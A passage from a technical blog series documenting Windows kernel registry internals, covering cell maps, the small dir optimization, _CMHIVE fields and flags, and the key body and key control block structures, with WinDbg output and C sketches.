As discussed in Part 5, almost every cell contains references to other cells in the hive in the form of cell indexes. Consequently, virtually every registry operation involves multiple rounds of translating cell indexes into their corresponding virtual addresses in order to traverse the registry structure. Section views are stored in a red-black tree, so searching them has O(log n) complexity. This may seem decent, but considering that on a typical system the registry is read much more often than it is extended or shrunk, it makes sense to further optimize the search operation at the cost of less efficient insertion/deletion. And this is exactly what cell maps provide: constant-time, O(1) lookups, at the price of insertion/deletion slowing down from O(log n) to O(n). Thanks to this technique, HvpGetCellPaged – perhaps the hottest function in the Windows registry implementation – executes in constant time.
In technical terms, cell maps are pagetable-like structures that divide the 32-bit hive address space into smaller, nested layers consisting of so-called directories, tables, and entries. As a reminder, the layout of cell indexes and cell maps is illustrated in the diagram below, based on a similar diagram in the Windows Internals book, which itself draws from Mark Russinovich's 1999 article, Inside the Registry:
Given the nature of the data structure, the corresponding cell map walk involves dereferencing three nested arrays based on the subsequent 1, 10 and 9-bit parts of the cell index, and then adding the final 12-bit offset to the page-aligned address of the target block. The internal kernel structures matching the respective layers of the cell map are _DUAL, _HMAP_DIRECTORY, _HMAP_TABLE and _HMAP_ENTRY, all publicly accessible via the ntoskrnl.exe PDB symbols. The entry point to the cell map is the Storage array at the end of the _HHIVE structure:
0: kd> dt _HHIVE
nt!_HHIVE
  [...]
   +0x110 Storage          : [2] _DUAL
The index into the two-element array represents the storage type, 0 for stable and 1 for volatile, so a single _DUAL structure describes a 2 GiB view of a specific storage space:
0: kd> dt _DUAL
nt!_DUAL
   +0x000 Length           : Uint4B
   +0x008 Map              : Ptr64 _HMAP_DIRECTORY
   +0x010 SmallDir         : Ptr64 _HMAP_TABLE
   +0x018 Guard            : Uint4B
   +0x020 FreeDisplay      : [24] _FREE_DISPLAY
   +0x260 FreeBins         : _LIST_ENTRY
   +0x270 FreeSummary      : Uint4B
Let's examine the semantics of each field:
Length: Expresses the current length of the given storage space in bytes. Directly after loading the hive, the stable length is equal to the size of the hive on disk (including any data recovered from log files, minus the 4096 bytes of the header), and the volatile space is empty by definition. Only cell map entries within the [0, Length - 1] range are guaranteed to be valid.
Map: Points to the actual directory structure represented by _HMAP_DIRECTORY.
SmallDir: Part of the "small dir" optimization, discussed in the next section.
Guard: Its specific role is unclear, as the field is always initialized to 0xFFFFFFFF upon allocation and never used afterwards. I expect that it is some kind of debugging remnant from the early days of the registry development, presumably related to the small dir optimization.
FreeDisplay: A data structure used to optimize searches for free cells during the cell allocation process. It consists of 24 buckets, each corresponding to a specific cell size range and represented by the _FREE_DISPLAY structure, indicating which pages in the hive may potentially contain free cells of the given length.
FreeBins: The head of a doubly-linked list that links the descriptors of entirely empty bins in the hive, represented by the _FREE_HBIN structures.
FreeSummary: A bitmask indicating which buckets within FreeDisplay have any hints set for the given cell size. A zero bit at a given position means that there are no free cells of the specific size range anywhere in the hive.
The next level in the cell map hierarchy is the _HMAP_DIRECTORY structure:
0: kd> dt _HMAP_DIRECTORY
nt!_HMAP_DIRECTORY
   +0x000 Directory : [1024] Ptr64 _HMAP_TABLE
As we can see, it is simply a 1024-element array of pointers to _HMAP_TABLE:
0: kd> dt _HMAP_TABLE
nt!_HMAP_TABLE
   +0x000 Table : [512] _HMAP_ENTRY
Each directory entry, in turn, points to a 512-element array of _HMAP_ENTRY structures, which constitute the final level of the cell map:
0: kd> dt _HMAP_ENTRY
nt!_HMAP_ENTRY
   +0x000 BlockOffset : Uint8B
   +0x008 PermanentBinAddress : Uint8B
   +0x010 MemAlloc : Uint4B
This last level contains a descriptor of a single page in the hive and warrants a deeper analysis. Let's start by noting that the four least significant bits of PermanentBinAddress correspond to a set of undocumented flags that control various aspects of the page behavior. I was able to reverse-engineer them and partially recover their names, largely thanks to the fact that some older Windows 10 builds contained non-inlined functions operating on these flags, with revealing names like HvpMapEntryIsDiscardable or HvpMapEntryIsTrimmed:
enum _MAP_ENTRY_FLAGS
{
  MAP_ENTRY_NEW_ALLOC = 0x1,
  MAP_ENTRY_DISCARDABLE = 0x2,
  MAP_ENTRY_TRIMMED = 0x4,
  MAP_ENTRY_DUMMY = 0x8,
};
Here's a brief summary of their meaning based on my understanding:
MAP_ENTRY_NEW_ALLOC: Indicates that this is the first page of a bin. Cell indexes pointing into this page must specify an offset within the range of [0x20, 0xFFF], as they cannot fall into the first 32 bytes that correspond to the _HBIN structure.
MAP_ENTRY_DISCARDABLE: Indicates that the whole bin is empty and consists of a single free cell.
MAP_ENTRY_TRIMMED: Indicates that the page has been marked as "trimmed" in HvTrimHive. More specifically, this property is related to hive reorganization, and is set during the loading process on some number of trailing pages that only contain keys accessed during boot, or not accessed at all since the last reorganization. The overarching goal is likely to prevent introducing unnecessary fragmentation in the hive by avoiding mixing together keys with different access histories.
MAP_ENTRY_DUMMY: Indicates that the page is allocated from the kernel pool and isn't part of a section view.
With this in mind, let's dive into the details of each _HMAP_ENTRY structure member:
PermanentBinAddress: The lower 4 bits contain the above flags. The upper 60 bits represent the base address of the bin mapping corresponding to this page.
BlockOffset: This field has a dual functionality. If the MAP_ENTRY_DISCARDABLE flag is set, it is a pointer to a descriptor of a free bin, _FREE_HBIN, linked into the _DUAL.FreeBins linked list. If it is clear (the typical case), it expresses the offset of the page relative to the start of the bin. Therefore, the virtual address of the block's data in memory can be calculated as (PermanentBinAddress & (~0xF)) + BlockOffset.
MemAlloc: If the MAP_ENTRY_NEW_ALLOC flag is set, it contains the size of the bin, otherwise it is zero.
And this concludes the description of how cell maps are structured. Taking all of it into account, the implementation of the HvpGetCellPaged function starts to make a lot of sense. Its pseudocode comes down to the following:
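Under the structure definitions above, that pseudocode can be approximated by the following sketch (my own reconstruction, with struct layouts reduced to the fields involved; the real routine returns a kernel virtual address, modeled here as a plain integer):

```c
#include <stdint.h>

/* Struct stand-ins reduced to the fields used by the cell map walk;
 * the real layouts are shown in the dt listings earlier in this section. */
typedef struct {
    uint64_t BlockOffset;
    uint64_t PermanentBinAddress;  /* low 4 bits hold _MAP_ENTRY_FLAGS */
} HMAP_ENTRY;

typedef struct { HMAP_ENTRY Table[512]; } HMAP_TABLE;
typedef struct { HMAP_TABLE *Directory[1024]; } HMAP_DIRECTORY;
typedef struct { uint32_t Length; HMAP_DIRECTORY *Map; } DUAL;
typedef struct { DUAL Storage[2]; } HHIVE;

/* Reconstruction of the HvpGetCellPaged logic: note the complete lack of
 * bounds checking on any part of the cell index. The final +4 skips the
 * cell's 32-bit size field, yielding the address of the cell's payload. */
static uint64_t GetCellPagedVa(HHIVE *Hive, uint32_t Index) {
    DUAL *Dual = &Hive->Storage[Index >> 31];
    HMAP_TABLE *Table = Dual->Map->Directory[(Index >> 21) & 0x3FF];
    HMAP_ENTRY *Entry = &Table->Table[(Index >> 12) & 0x1FF];
    uint64_t BinBase = Entry->PermanentBinAddress & ~(uint64_t)0xF;
    return BinBase + Entry->BlockOffset + (Index & 0xFFF) + 4;
}
```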
The same process is followed, for example, by the implementation of the WinDbg !reg cellindex extension, which also translates a pair of a hive pointer and a cell index into the virtual address of the cell.
The small dir optimization
There is one other implementation detail about the cell maps worth mentioning here – the small dir optimization. Let's start with the observation that a majority of registry hives in Windows are relatively small, below 2 MiB in size. This can be easily verified by using the !reg hivelist command in WinDbg, and taking note of the values in the "Stable Length" and "Volatile Length" columns. Most of them usually contain values ranging from several kilobytes to hundreds of kilobytes. This means that if the kernel allocated the full first-level directory for these hives (taking up 1024 entries × 8 bytes = 8 KiB on 64-bit platforms), they would still only use the first element in it, leading to a non-trivial waste of memory – especially in the context of the early 1990s, when the registry was first implemented. In order to optimize this common scenario, Windows developers employed an unconventional approach: they simulate a one-element "array" with the SmallDir member of the _DUAL structure, and have the _DUAL.Map pointer point at it instead of a separate pool allocation whenever possible. Later, whenever the hive grows and requires more than one element of the cell map directory, the kernel falls back to the standard behavior and performs a normal pool allocation for the directory array.
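The decision logic can be illustrated with a user-mode sketch (hypothetical types and names; the real code operates on _DUAL and kernel pool allocations):

```c
#include <stdint.h>
#include <stdlib.h>

#define PAGE_SIZE  0x1000ull
#define TABLE_SPAN (512 * PAGE_SIZE)  /* hive range covered by one table */

/* Hypothetical stand-ins for _HMAP_TABLE and _HMAP_DIRECTORY. */
typedef struct { uint64_t Entry[512]; } MAP_TABLE;
typedef struct { MAP_TABLE *Directory[1024]; } MAP_DIR;

typedef struct {
    uint64_t   Length;
    MAP_DIR   *Map;
    MAP_TABLE *SmallDir;  /* the single inline "directory slot" */
} DUAL_SKETCH;

/* If the storage space fits in one table, point Map at the SmallDir field
 * itself, so that Map->Directory[0] reads the SmallDir pointer - the
 * one-element "array" trick described above. Otherwise allocate a full
 * directory, mimicking the pool fallback. Returns 1 if a real directory
 * allocation was made. */
static int InitMap(DUAL_SKETCH *d, MAP_TABLE *first_table) {
    d->SmallDir = first_table;
    if (d->Length <= TABLE_SPAN) {
        d->Map = (MAP_DIR *)&d->SmallDir;   /* small dir in use */
        return 0;
    }
    d->Map = calloc(1, sizeof(MAP_DIR));    /* full 8 KiB directory */
    d->Map->Directory[0] = first_table;
    return 1;
}
```

Note how, on the small-dir path, any access to Directory[1] through Directory[1023] would read whatever memory happens to follow the SmallDir field, which is exactly the behavior discussed below.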
A revised diagram illustrating the cell map layout of a small hive is shown below:
Here, we can see that indexes 1 through 1023 of the directory array are invalid. Instead of correctly initialized _HMAP_TABLE structures, they point into "random" data corresponding to other members of the _DUAL and the larger _CMHIVE structure that happen to be located after _DUAL.SmallDir. Ordinarily, this is merely a low-level detail that doesn't have any meaningful implications, as all actively loaded hives remain internally consistent and always contain cell indexes that remain within the bounds of the hive's storage space. However, if we look at it through the security lens of hive-based memory corruption, this behavior suddenly becomes very interesting. If an attacker was able to implant an out-of-bounds cell index with the directory index greater than 0 into a hive, they would be able to get the kernel to operate on invalid (but deterministic) data as part of the cell map walk, and enable a powerful arbitrary read/write primitive. In addition to the small dir optimization, this technique is also enabled by the fact that the HvpGetCellPaged routine doesn't perform any bounds checks of the cell indexes, instead blindly trusting that they are always valid.
If you are curious to learn more about the exploitation aspect of out-of-bounds cell indexes, it was the main subject of my Practical Exploitation of Registry Vulnerabilities in the Windows Kernel talk given at OffensiveCon 2024 (slides and video recording are available). I will also discuss it in more detail in one of the future blog posts focused specifically on the security impact of registry vulnerabilities.
_CMHIVE structure overview
Beyond the first member of type _HHIVE at offset 0, the _CMHIVE structure contains more than 3 KiB of further information describing an active hive. This data relates to concepts more abstract than memory management, such as the registry tree structure itself. Below, instead of a field-by-field analysis, we'll focus on the general categories of information within _CMHIVE, organized loosely by increasing complexity of the data structures:
Reference count: a 32-bit refcount primarily used during short-term operations on the hive, to prevent the object from being freed while it is actively operated on. It is managed by the thin wrappers CmpReferenceHive and CmpDereferenceHive.
File handles and sizes: handles and current sizes of the hive files on disk, such as the main hive file (.DAT) and the accompanying log files (.LOG, .LOG1, .LOG2). The handles are stored in FileHandles array, and the sizes reside in ActualFileSize and LogFileSizes.
Text strings: some informational strings that may prove useful when trying to identify a hive based on its _CMHIVE structure. For example, the hive file name is stored in FileUserName, and the hive mount point path is stored in HiveRootPath.
Timestamps: there are several timestamps that can be found in the hive descriptor, such as DirtyTime, UnreconciledTime or LastWriteTime.
List entries: instances of the _LIST_ENTRY structure used to link the hive into various double-linked lists, such as the global list of hives in the system (HiveList, starting at nt!CmpHiveListHead), or the list of hives within a common trust class (TrustClassEntry).
Synchronization mechanisms: various objects used to synchronize access to the hive as a whole, or some of its parts. Examples include HiveRundown, SecurityLock and HandleClosePendingEvent.
Unload history: a 128-element array that stores the number of steps that have been successfully completed in the process of unloading the hive. Its specific purpose is unclear; it might be a debugging artifact retained from older versions of Windows.
Late unload state: objects related to deferred unloading of registry hives (LateUnloadWorkItemState, LateUnloadFinishedEvent, LateUnloadWorkItem).
Hive layout information: the hive reorganization process in Windows tries to optimize hives by grouping together keys accessed during system runtime, followed by keys accessed during system boot, followed by completely unused keys. If a hive is structured according to this order during load, the kernel saves information about the boundaries between the three distinct areas in the BootStart, UnaccessedStart and UnaccessedEnd members of _CMHIVE.
Flushing state and dirty block information: any state that has to do with marking cells as dirty and synchronizing their contents to disk. There are a significant number of fields related to the functionality, with names starting with "Flush...", "Unreconciled..." and "CapturedUnreconciled...".
Volume context: a pointer to a public _CMP_VOLUME_CONTEXT structure, which provides extended information about the disk volume of the hive file. As an example, it is used in the internal CmpVolumeContextMustHiveFilePagesBeKeptLocal routine to determine whether the volume is a system one, and consequently whether certain security/reliability assumptions are guaranteed for it or not.
KCB table and root KCB: a table of the globally visible KCB (Key Control Block) structures corresponding to keys in the hive, and a pointer to the root key's KCB. I will discuss KCBs in more detail in the "Key structures" section below.
Security descriptor cache: a cache of all security descriptors present in the hive, allocated from the kernel pool and thus accessible more efficiently than the underlying hive mappings. In my bug reports, I have often taken advantage of the security cache as a straightforward way to demonstrate the exploitability of security descriptor use-after-frees. A security node UAF can be easily converted into a UAF of its pool-based cached object, which then reliably triggers a Blue Screen of Death when Special Pool is enabled. The security cache of any given hive can be enumerated using the !reg seccache command in WinDbg.
Transaction-related objects: a pointer to a _CM_RM structure that describes the Resource Manager object associated with the hive, if "heavyweight" transactions (i.e. KTM transactions) are enabled for it.
Last but not least, _CMHIVE has its own Flags field that is different from _HHIVE.Flags. As usual, the flags are not documented, so the listing below is a product of my own analysis:
enum _CM_HIVE_FLAGS
{
  CM_HIVE_UNTRUSTED = 0x1,
  CM_HIVE_IN_SID_MAPPING_TABLE = 0x2,
  CM_HIVE_HAS_RM = 0x8,
  CM_HIVE_IS_VIRTUALIZABLE = 0x10,
  CM_HIVE_APP_HIVE = 0x20,
  CM_HIVE_PROCESS_PRIVATE = 0x40,
  CM_HIVE_MUST_BE_REORGANIZED = 0x400,
  CM_HIVE_DIFFERENCING_WRITETHROUGH = 0x2000,
  CM_HIVE_CLOUDFILTER_PROTECTED = 0x10000,
};
A brief description of each of them is as follows:
CM_HIVE_UNTRUSTED: the hive is "untrusted" in the sense of registry symbolic links; in other words, it is not one of the default system hives loaded on boot. The distinction is that trusted hives can freely link to all other hives in the system, while untrusted ones can only link to hives within their so-called trust class. This is to prevent confused deputy-style privilege escalation attacks in the system.
CM_HIVE_IN_SID_MAPPING_TABLE: the hive is linked into an internal data structure called the "SID mapping table" (nt!CmpSIDToHiveMapping), used to efficiently look up the user class hives mounted at \Registry\User\<SID>_Classes for the purposes of registry virtualization.
CM_HIVE_HAS_RM: KTM transactions are enabled for this hive, meaning that the corresponding .blf and .regtrans-ms files are present in the same directory as the main hive file. The flag is clear if the hive is an app hive or if it was loaded with the REG_HIVE_NO_RM flag set.
CM_HIVE_IS_VIRTUALIZABLE: accesses to this hive may be subject to registry virtualization. As far as I know, the only hive with this flag set is currently HKLM\SOFTWARE, which seems in line with the official documentation.
CM_HIVE_APP_HIVE: this is an app hive, i.e. it was loaded under \Registry\A with the REG_APP_HIVE flag set.
CM_HIVE_PROCESS_PRIVATE: this hive is private to the loading process, i.e. it was loaded with the REG_PROCESS_PRIVATE flag set.
CM_HIVE_MUST_BE_REORGANIZED: the hive fragmentation threshold (by default 1 MiB) has been exceeded, and the hive should undergo the reorganization process at the next opportunity. The flag is simply a means of communication between the CmCheckRegistry and CmpReorganizeHive internal routines, both of which execute during hive loading.
CM_HIVE_DIFFERENCING_WRITETHROUGH: this is a delta hive loaded in the writethrough mode, which technically means that the DIFF_HIVE_WRITETHROUGH flag was specified in the DiffHiveFlags member of the VRP_LOAD_DIFFERENCING_HIVE_INPUT structure, as discussed in Part 4.
CM_HIVE_CLOUDFILTER_PROTECTED: new flag added in December 2024 as part of the fix for CVE-2024-49114. It indicates that the hive file has been protected against being converted to a Cloud Filter placeholder by setting the "$Kernel.CFDoNotConvert" extended attribute (EA) on the file in CmpAdjustFileCFSafety.
This concludes the documentation of the hive descriptor structure, arguably the largest and most complex object in the Windows registry implementation.
Key structures
The second most important objects in the registry are keys. They can be basically thought of as the essence of the registry, as nearly every registry operation involves them in some way. They are also the one and only registry element that is tightly integrated with the Windows NT Object Manager. This comes with many benefits, as client applications can operate on the registry using standardized handles, and can leverage automatic security checks and object lifetime management. However, this integration also presents its own challenges, as it requires the Configuration Manager to interact with the Object Manager correctly and handle its intricacies and edge cases securely. For this reason, internal key-related structures play a crucial role in the registry implementation. They help organize key state in a way that simplifies keeping it up-to-date and internally consistent. For security researchers, understanding these structures and their semantics is invaluable. This knowledge enables you to quickly identify bugs in existing code or uncover missing handling of unusual but realistic conditions.
The two fundamental key structures in the Windows kernel are the key body (_CM_KEY_BODY) and key control block (_CM_KEY_CONTROL_BLOCK). The key body is directly associated with a key handle in the NT Object Manager, similar to the role that the _FILE_OBJECT structure plays for file handles. In other words, this is the initial object that the kernel obtains whenever it calls ObReferenceObjectByHandle to reference a user-supplied handle. Multiple key body structures may exist concurrently for a single key, one for each of the active handles held by client programs. Conversely, the key control block represents the global state of a specific key and is used to manage its general properties. This means that for most keys in the system, there is at most one KCB allocated at a time. There may be no KCB for keys that haven't been accessed yet (as they are initialized by the kernel lazily), and there may be more than one KCB for the same registry path if the key has been deleted and created again (these two instances of the key are treated as separate entities, with one of them being marked as deleted/non-existent). Taking this into account, the relationship between key bodies and KCBs is many-to-one, with all of the key bodies of a single KCB being connected in a doubly-linked list, as shown in the diagram below:
The following subsections provide more detail about each of these two structures.
Key body
The key body structure is allocated and initialized in the internal CmpCreateKeyBody routine, and freed by the NT Object Manager when all references to the object are dropped. It is a relatively short and simple object with the following definition:
0: kd> dt _CM_KEY_BODY
nt!_CM_KEY_BODY
   +0x000 Type : Uint4B
   +0x004 AccessCheckedLayerHeight : Uint2B
   +0x008 KeyControlBlock : Ptr64 _CM_KEY_CONTROL_BLOCK
   +0x010 NotifyBlock : Ptr64 _CM_NOTIFY_BLOCK
   +0x018 ProcessID : Ptr64 Void
   +0x020 KeyBodyList : _LIST_ENTRY
   +0x030 Flags : Pos 0, 16 Bits
   +0x030 HandleTags : Pos 16, 16 Bits
   +0x038 Trans : _CM_TRANS_PTR
   +0x040 KtmUow : Ptr64 _GUID
   +0x048 ContextListHead : _LIST_ENTRY
   +0x058 EnumerationResumeContext : Ptr64 Void
   +0x060 RestrictedAccessMask : Uint4B
   +0x064 LastSearchedIndex : Uint4B
   +0x068 LockedMemoryMdls : Ptr64 Void
Let's quickly go over each field:
Type: for normal keys (i.e. almost all of them), this field is set to a magic value of 0x6B793032 ('ky02'). However, for predefined keys, this is the 32-bit value of the link's target key with the highest bit set. This member is therefore used to distinguish between regular keys and predefined ones, for example in CmObReferenceObjectByHandle. Predefined keys have now been largely deprecated, but it is still possible to observe a non-standard Type value by opening a handle to one of the last two remaining ones: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Perflib\009 and CurrentLanguage under the same path.
AccessCheckedLayerHeight: a new field added in November 2023 as part of the fix for CVE-2023-36404. It is used for layered keys and contains the index of the lowest layer in the key stack that was access-checked when opening the key. It is later taken into account during other registry operations, in order to avoid leaking data from lower-layer, more restrictive keys that could have been created since the handle was opened.
KeyControlBlock: a pointer to the corresponding key control block.
NotifyBlock: an optional pointer to the notify block associated with this handle. This is related to the key notification functionality in Windows and is described in more detail in the "Key notification structures" section below.
ProcessID: the PID of the process that created the handle. It doesn't seem to serve any purpose in the kernel other than to be enumerable using the NtQueryOpenSubKeysEx system call (which requires SeRestorePrivilege, and is therefore available to administrators only).
KeyBodyList: the list entry used to link all the key bodies within a single KCB together.
Flags: a set of flags concerning the specific key body. Here's my interpretation of them based on reverse engineering:
KEY_BODY_HIVE_UNLOADED (0x1): indicates that the underlying hive of the key has been unloaded and is no longer active.
KEY_BODY_DONT_RELOCK (0x2): this seems to be a short-term flag used to communicate between CmpCheckKeyBodyAccess/CmpCheckOpenAccessOnKeyBody and the nested CmpDoQueryKeyName routine, in order to indicate that the key's KCB is already locked and shouldn't be relocked again.
KEY_BODY_DONT_DEINIT (0x4): if this flag is set, CmpDeleteKeyObject returns early and doesn't proceed with the regular deinitialization of the key body object. However, it is unclear if/where the flag is set in the code, as I personally haven't found any instances of it happening during my analysis.
KEY_BODY_DELETED (0x8): indicates that the key has been deleted since the handle was opened, and it no longer exists.
KEY_BODY_DONT_VIRTUALIZE (0x10): indicates that registry virtualization is disabled for this handle, as a result of opening the key with the (undocumented but present in SDK headers) REG_OPTION_DONT_VIRTUALIZE flag.
HandleTags: from the kernel perspective, this is simply a general purpose 16-bit storage that can be set by clients on a per-handle basis using NtSetInformationKey with the KeySetHandleTagsInformation information class, and queried with NtQueryKey and the KeyHandleTagsInformation information class. As far as I know, the kernel doesn't dictate how this field should be used and leaves it up to the registry clients. In practice, it seems to be mostly used for purposes related to WOW64 and the Registry Redirector, storing flags such as KEY_WOW64_64KEY (0x100) and KEY_WOW64_32KEY (0x200), as well as some internal ones. The WOW64 functionality is implemented in KernelBase.dll, and functions such as ConstructKernelKeyPath and LocalBaseRegOpenKey are a good starting point for reverse engineering, if you're curious to learn more. I have also observed the 0x1000 handle tag being set in the internal IopApplyMutableTagToRegistryKey kernel routine for keys such as HKLM\System\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000, but I'm unsure of its meaning.
Trans: Indicates the transactional state of the handle. If the handle is not transacted (i.e. it wasn't opened with one of RegOpenKeyTransacted or RegCreateKeyTransacted), it is set to zero. Otherwise, the lowest bit specifies the type of the transaction: 0 for KTM and 1 for lightweight transactions. The remaining bits form a pointer to the associated transaction object, either of the TmTransactionObjectType type (represented by the _KTRANSACTION structure), or of the CmRegistryTransactionType type (represented by a non-public structure that I've personally named _CM_LIGHTWEIGHT_TRANS_OBJECT).
KtmUow: if the handle is associated with a KTM transaction, this field stores the GUID that uniquely identifies it. For non-transacted and lightweight-transacted handles, the field is unused.
EnumerationResumeContext: this is part of an optimization of the subkey enumeration process of layered keys (implemented in CmpEnumerateLayeredKey). Performing full enumeration of a layered key from scratch up to the given index is a very complex task, and repeating it over and over for each iteration of an enumeration loop would be very inefficient. The resume context helps address the problem for sequential enumeration by saving the intermediate state reached at an NtEnumerateKey call with a given index, and being able to resume from it when a request for index+1 comes next. It also has the added benefit of making it possible to stop and restart the enumeration process in the scope of a single system call, which is used to pause the operation and temporarily release some locks if the code detects that the registry is particularly congested. This happens at the intersection of the CmEnumerateKey and CmpEnumerateLayeredKey functions, with the latter potentially returning STATUS_RETRY and the former resuming the operation if such a situation arises.
RestrictedAccessMask, LastSearchedIndex, LockedMemoryMdls: relatively new fields introduced in Windows 10 and 11, which I haven't looked very deeply into and thus won't discuss in detail here.
After a key handle is translated into the corresponding _CM_KEY_BODY structure using the ObReferenceObjectByHandle(CmKeyObjectType) call, typically early in the execution of a registry-related system call, there are three primary operations that are usually performed. First, the kernel does a key status check by evaluating the expression KeyBody.Flags & 9 to determine if the key is associated with an unloaded hive (flag 0x1) or has been deleted (flag 0x8). This check is essential because most registry operations are only permitted on active, existing keys, and enforcing this condition is a fundamental step for guaranteeing registry state consistency. Second, the code accesses the KeyControlBlock pointer, which provides further access to the hive pointer (KCB.KeyHive), the key's cell index (KCB.KeyCell), and other necessary fields and data structures required to perform any meaningful read/write actions on the key. Finally, the code checks the key body's Trans/KtmUow members to determine if the handle is part of a transaction, and if so, the transaction is used as additional context for the action requested by the caller. Accesses to other members of the _CM_KEY_BODY structure are less frequent and serve more specialized purposes.
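These three steps can be illustrated with a simplified sketch (the field subset and helper name are mine; the flag values come from the list above, and returning STATUS_KEY_DELETED for both failure cases is a simplification of the real error handling):

```c
#include <stdint.h>

/* Key body flag bits, as reverse-engineered in the list above. */
#define KEY_BODY_HIVE_UNLOADED 0x1
#define KEY_BODY_DELETED       0x8

#define STATUS_SUCCESS     ((int32_t)0x00000000)
#define STATUS_KEY_DELETED ((int32_t)0xC000017C)

/* Field subset of _CM_KEY_BODY relevant to the three steps. */
typedef struct {
    uint16_t Flags;
    void    *KeyControlBlock;
    uint64_t Trans;  /* low bit: transaction type, rest: object pointer */
} KEY_BODY_SKETCH;

static int32_t CheckKeyBody(const KEY_BODY_SKETCH *kb,
                            void **kcb, int *transacted) {
    /* Step 1: the "Flags & 9" status check - bail out if the hive was
     * unloaded (0x1) or the key was deleted (0x8). */
    if (kb->Flags & (KEY_BODY_HIVE_UNLOADED | KEY_BODY_DELETED))
        return STATUS_KEY_DELETED;
    /* Step 2: grab the KCB, which leads to KeyHive/KeyCell and friends. */
    *kcb = kb->KeyControlBlock;
    /* Step 3: a non-zero Trans means the handle is transacted. */
    *transacted = (kb->Trans != 0);
    return STATUS_SUCCESS;
}
```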
Key control block
The key control block object can be thought of as the heart of the Windows kernel registry tree representation. It is effectively the descriptor of a single key in the system, and the second most important key-related object after the key node. It is always allocated from the kernel pool, and serves four main purposes:
Mirrors frequently used information from the key node to make it faster to access by the kernel code. This includes building an efficient, in-memory representation of the registry tree to optimize the traversal time when referring to registry paths.
Works as a single point of reference for all active handles to a specific key, and helps synchronize access to the key in the multithreaded Windows environment.
Represents any pending, transacted state of the registry key that has been introduced by a client, but not fully committed yet.
Represents any complex relationships between registry keys that extend beyond the internal structure of the hive. The primary example are differencing hives, which are overlaid on top of each other, and whose corresponding keys form so-called key stacks.
Blog post #2 in this series highlighted the dramatic growth of the registry codebase across successive Windows versions, illustrating the subsystem's steady expansion over the last few decades. Similarly, the size of the Key Control Block (KCB) itself has nearly doubled over time, from 168 bytes in Windows XP x64 to 312 bytes in the latest Windows 11 release. This expansion underscores the increasing amount of information associated with every registry key, which the kernel must manage consistently and securely.
The KCB structure layout is present in the PDB symbols and can be displayed in WinDbg:
0: kd> dt _CM_KEY_CONTROL_BLOCK
nt!_CM_KEY_CONTROL_BLOCK
   +0x000 RefCount : Uint8B
   +0x008 ExtFlags : Pos 0, 16 Bits
   +0x008 Freed : Pos 16, 1 Bit
   +0x008 Discarded : Pos 17, 1 Bit
   +0x008 HiveUnloaded : Pos 18, 1 Bit
   +0x008 Decommissioned : Pos 19, 1 Bit
   +0x008 SpareExtFlag : Pos 20, 1 Bit
   +0x008 TotalLevels : Pos 21, 10 Bits
   +0x010 KeyHash : _CM_KEY_HASH
   +0x010 ConvKey : _CM_PATH_HASH
   +0x018 NextHash : Ptr64 _CM_KEY_HASH
   +0x020 KeyHive : Ptr64 _HHIVE
   +0x028 KeyCell : Uint4B
   +0x030 KcbPushlock : _EX_PUSH_LOCK
   +0x038 Owner : Ptr64 _KTHREAD
   +0x038 SharedCount : Int4B
   +0x040 DelayedDeref : Pos 0, 1 Bit
   +0x040 DelayedClose : Pos 1, 1 Bit
   +0x040 Parking : Pos 2, 1 Bit
   +0x041 LayerSemantics : UChar
   +0x042 LayerHeight : Int2B
   +0x044 Spare1 : Uint4B
   +0x048 ParentKcb : Ptr64 _CM_KEY_CONTROL_BLOCK
   +0x050 NameBlock : Ptr64 _CM_NAME_CONTROL_BLOCK
   +0x058 CachedSecurity : Ptr64 _CM_KEY_SECURITY_CACHE
   +0x060 ValueList : _CHILD_LIST
   +0x068 LinkTarget : Ptr64 _CM_KEY_CONTROL_BLOCK
   +0x070 IndexHint : Ptr64 _CM_INDEX_HINT_BLOCK
   +0x070 HashKey : Uint4B
   +0x070 SubKeyCount : Uint4B
   +0x078 KeyBodyListHead : _LIST_ENTRY
   +0x078 ClonedListEntry : _LIST_ENTRY
   +0x088 KeyBodyArray : [4] Ptr64 _CM_KEY_BODY
   +0x0a8 KcbLastWriteTime : _LARGE_INTEGER
   +0x0b0 KcbMaxNameLen : Uint2B
   +0x0b2 KcbMaxValueNameLen : Uint2B
   +0x0b4 KcbMaxValueDataLen : Uint4B
   +0x0b8 KcbUserFlags : Pos 0, 4 Bits
   +0x0b8 KcbVirtControlFlags : Pos 4, 4 Bits
   +0x0b8 KcbDebug : Pos 8, 8 Bits
   +0x0b8 Flags : Pos 16, 16 Bits
   +0x0bc Spare3 : Uint4B
   +0x0c0 LayerInfo : Ptr64 _CM_KCB_LAYER_INFO
   +0x0c8 RealKeyName : Ptr64 Char
   +0x0d0 KCBUoWListHead : _LIST_ENTRY
   +0x0e0 DelayQueueEntry : _LIST_ENTRY
   +0x0e0 Stolen : Ptr64 UChar
   +0x0f0 TransKCBOwner : Ptr64 _CM_TRANS
   +0x0f8 KCBLock : _CM_INTENT_LOCK
   +0x108 KeyLock : _CM_INTENT_LOCK
   +0x118 TransValueCache : _CHILD_LIST
   +0x120 TransValueListOwner : Ptr64 _CM_TRANS
   +0x128 FullKCBName : Ptr64 _UNICODE_STRING
   +0x128 FullKCBNameStale : Pos 0, 1 Bit
   +0x128 Reserved : Pos 1, 63 Bits
   +0x130 SequenceNumber : Uint8B
I will not document each member individually, but will instead cover them in larger groups according to their common themes and functions.
Reference count
Key Control Blocks are among the most frequently referenced registry objects, as almost every persistent registry operation involves an associated KCB. These blocks are referenced in various ways: by a subkey's KCB.ParentKcb pointer, a symbolic link key's KCB.LinkTarget pointer, through the global KCB tree, via open key handles (and the corresponding key bodies), in pending transacted operations (e.g., the _CM_KCB_UOW.KeyControlBlock pointer), and so on.
For system stability and security, it's crucial to accurately track all of these active KCB references. This is done using the RefCount field, the first member in the KCB structure (offset 0x0). Historically a 16-bit field, it later became a 32-bit integer, and on modern systems it is a native word in size, i.e. 64 bits on most computers. Whenever kernel code needs to operate on a KCB or store a pointer to it, it should increment the RefCount using functions from the CmpReferenceKeyControlBlock family. Conversely, when a KCB reference is no longer needed, functions like CmpDereferenceKeyControlBlock should decrement the count. When RefCount reaches zero, the kernel knows the structure is no longer in use and can safely free it.
Besides standard reference counting, KCBs employ optimizations to delay certain memory management operations. This avoids excessive KCB allocation and deallocation when a KCB is only briefly unreferenced. Two mechanisms are used: delay deref and delay close. The former delays the actual refcount decrement, while the latter postpones object deallocation even after RefCount reaches zero. Callers must use the specialized function CmpDelayDerefKeyControlBlock for the delayed dereference.
